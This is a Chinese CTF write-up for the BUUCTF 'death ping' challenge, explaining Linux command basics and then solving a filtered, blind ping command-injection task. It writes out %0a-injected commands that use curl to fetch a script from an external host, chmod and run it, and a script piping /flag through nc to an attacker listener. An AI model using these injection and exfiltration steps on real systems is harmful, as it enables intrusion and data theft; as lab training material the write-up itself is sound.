[实验室每日一题][20201123][Web]死亡ping命令
原题目:BUUCTF–[第二章 web进阶]死亡ping命令
前置基础(本题会用到的相关知识)
标准输入,标准输出是什么?
要弄清什么是标准输入输出。首先需要弄懂什么是IO。
IO 的 I 是 Input 的意思,O 是 output 的意思。
意味着输入和输出。
更确切的含义是:
I:从外部设备输入到内存
O:从内存输出到外部设备
转自:什么是标准输入、标准输出(stdin、stdout)?
linux中.sh文件是什么?
linux中“.sh”文件是脚本文件,一般都是bash脚本,我们可以使用sh命令运行“sh xxx.sh”,并且由于在linux中sh是链接到bash上的,所以sh与bash在功能上是没有区别的。
转自:https://www.php.cn/linux-419340.html
相关文章:执行*.sh 文件的6种方式
liunx命令
linux中 > 、>> 的用法
inux中>表示覆盖原文件内容,>>表示追加内容。
转自:linux中 > 、>> 的用法
管道操作符“|”
使用管道操作符“|”可以把一个命令的标准输出传送到另一个命令的标准输入中,连续的|意味着第一个命令的输出为第二个命令的输入,第二个命令的输入为第一个命令的输出,依次类推。
转自:管道符丨用法
ls命令
ls(英文全拼:list files):ls命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。
转自:菜鸟教程
cat命令
cat(英文全拼:concatenate):cat命令用于连接文件并打印到标准输出设备上。
转自:菜鸟教程
curl命令
curl(英文全拼:CommandLine Uniform Resource Locator):curl 是常用的命令行工具,用来请求 Web 服务器。它的名字就是客户端(client)的 URL 工具的意思。它的功能非常强大,命令行参数多达几十种。如果熟练的话,完全可以取代 Postman 这一类的图形界面工具。
转自:curl 命令行工具的使用及命令参数说明
chmod命令
chmod(英文全拼:change mode):chmod命令是控制用户对文件的权限的命令。
转自:菜鸟教程
nc命令
nc(英文全拼: Netcat ):功能强大的网络工具,体积小巧而出名,又被大家称为“瑞士军刀”。
转自:csdn
解题思路
这是一道非常明显的命令执行题目,使用nc反弹shell的方法得到flag。首先ping这个题目,实际上是题目的代码在服务器中执行了ping这个系统命令如果没有过滤的话,我们可以这样执行ip=127.0.0.1&&ls相当于在服务器上执行ping 127.0.0.1&&ls, &&是两条命令都执行,执行完ping之后执行ls是列出当前文件夹有什么文件然后我们使用ip=127.0.0.1&&cat index.php,相当于执行ping127.0.0.1&&catindex.php,执行完ping命令之后查看index.php文件内容
这样我们也就看到了index.php的内容。同样我们可以查看flag文件的内容
但是这道题目有过滤 并且没有回显 没有回显意思就是说 我们执行命令的结果无法在页面上显示出来 比如我们cat index.php读到了index的源码 但是页面不显示 依然没有用
因为过滤的比较严重 我们只能通过上传一个脚本文件来获得flag
转自:简书
相关文章:反弹shell原理与实现
解题步骤
第一步:抓包判断过滤
1、使用ping命令。
ip=127.0.0.1%0als
2、使用Burp Suite抓包,用爆破的方式来判断过滤的字符。
用手工注入的方式可以发现通过%0a能够注入新的一条命令进行执行。
补充说明:这里使用Burp Suit抓包的方式进行命令执行,而不是使用hackbar来做,是因为浏览器会产生二次编码。
第二步:搭建网站
1、这里使用的宝塔快速搭建网站
2、在网站根目录创建文件1.sh
3、编写1.sh,内容如下
ls|cat /flag | nc 公网ip地址 8089
4、打开端口
第三步
1、在靶机上用curl下载
127.0.0.1%0acurl 公网ip地址/1.sh > /tmp/1.sh #请求bash文件到tmp目录
回显成功。
2、给bash加权限
127.0.0.1%0achmod 777 /tmp/1.sh #给bash加权限
回显成功。
3、监听8089端口
nc -lvp 8089 #你的机器上进行监听8089端口
- -l 设置netcat处于监听状态等待连接。
- -V 显示错误提示信息。
- -p 设置本地监听的端口号
4、执行1.sh
127.0.0.1%0ash /tmp/1.sh
最后得到flag。
[实验室每日一题][20201123][Web]死亡ping命令相关推荐
- 实验室每日一题 2020.11.30
实验室每日一题 2020.11.30 先打开没有加密的文本文档,里面有一串密文,根据结尾的+推测应该是XXencode,直接找个在线网站解密,又得到一串密文:fwilvyhublqwhuhvwlqj, ...
- Java岗大厂面试百日冲刺 - 日积月累,每日三题【Day21】—— Linux命令
大家好,我是陈哈哈,北漂五年.相信大家和我一样,都有一个大厂梦,作为一名资深Java选手,深知面试重要性,接下来我准备用100天时间,基于Java岗面试中的高频面试题,以每日3题的形式,带你过一遍 ...
- [实验室每日一题][20201124][Zip已知明文攻击]
解题步骤 下载文件后,查看题目和题目描述. 发现题目中的文本为504b开头,猜测是zip文件,放入010editor中保存为zip文件,后再kali用binwalk和foremost分离,查看binw ...
- BUU N1BOOK题目死亡ping命令
介绍:路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串 version: "3.2"services:converter:image: registry.c ...
- [CTF] 每日一题汇总
[CTF] 每日一题汇总 WEB 编号 题目 知识点 No.0001 博兹瓦纳-爆破 zip伪加密.CRC校验 No.0002 莫桑比克-php是最好的语言 php伪协议.data协议 No.0003 ...
- 新玩法来了,web前端教程公众号推出《每日一题》
<每日一题>是一种新玩法,怎么玩?很简单. 直接回复 "我要做题" ,将获取最新一期的习题. 比如: 写下你认为正确的答案,回复给公众号. 还可以回复历史期号,查看历史 ...
- 后处理程序文件大小的变量_【每日一题】(17题)面试官问:JS中事件流,事件处理程序,事件对象的理解?...
关注「松宝写代码」,精选好文,每日一题 作者:saucxs | songEagle 2020,实「鼠」不易 2021,「牛」转乾坤 风劲潮涌当扬帆,任重道远须奋蹄! 一.前言 2020.12.23 立 ...
- Java岗大厂面试百日冲刺【Day46】— Linux2 (日积月累,每日三题)
大家好,我是陈哈哈,北漂五年.相信大家和我一样,都有一个大厂梦,作为一名资深Java选手,深知面试重要性,接下来我准备用100天时间,基于Java岗面试中的高频面试题,以每日3题的形式,带你过一遍 ...
- 运维面试题(每日一题)
每日一题 第一周 1.添加路由 2.如何防止Linux命令行或脚本里MySQL登录密码泄露? 3.将前端运行的服务或脚本,如何可以放置到后端进行执行 4.linux网络配置中如何给一块网卡添加多个IP ...
最新文章
- Ubuntu 和 Redhat / Fedora 服务管理命令对比表(附Fedora16新的服务管理工具systemctl )...
- 机器人学习--粒子滤波SLAM/MCL定位参考资料+学习经验
- 线段树优化的Dijkstra
- Android 获取短信验证码,自动填充
- python3 通过百度地图API获取城市POI点并存于CSV格式
- CSS多行文字垂直居中的两种方法
- jdk1.8新特性的应用-Stream 的终止操作
- 修改 Windows Host 文件工具
- android源码编译完成之后
- IT资源书籍999999999本
- 【C语言】—— 通讯录
- 值得注意的两个friendster新服务:校友和web共享搜索
- 32位java8,jdk8下载,解压版
- java和C程序员工资待遇差别大吗
- 18.Excel vba开发-计算个人所得税
- 1300款主流单机游戏下载 大型PC电脑游戏使命14尼尔5模拟合集
- bat使用命令解析-详细(转)
- 猪年开年喜报—涛思数据完成 Pre A轮融资
- 手把手教你写《雷神》游戏(四)
- 各类数据集整理(持续更新中ing)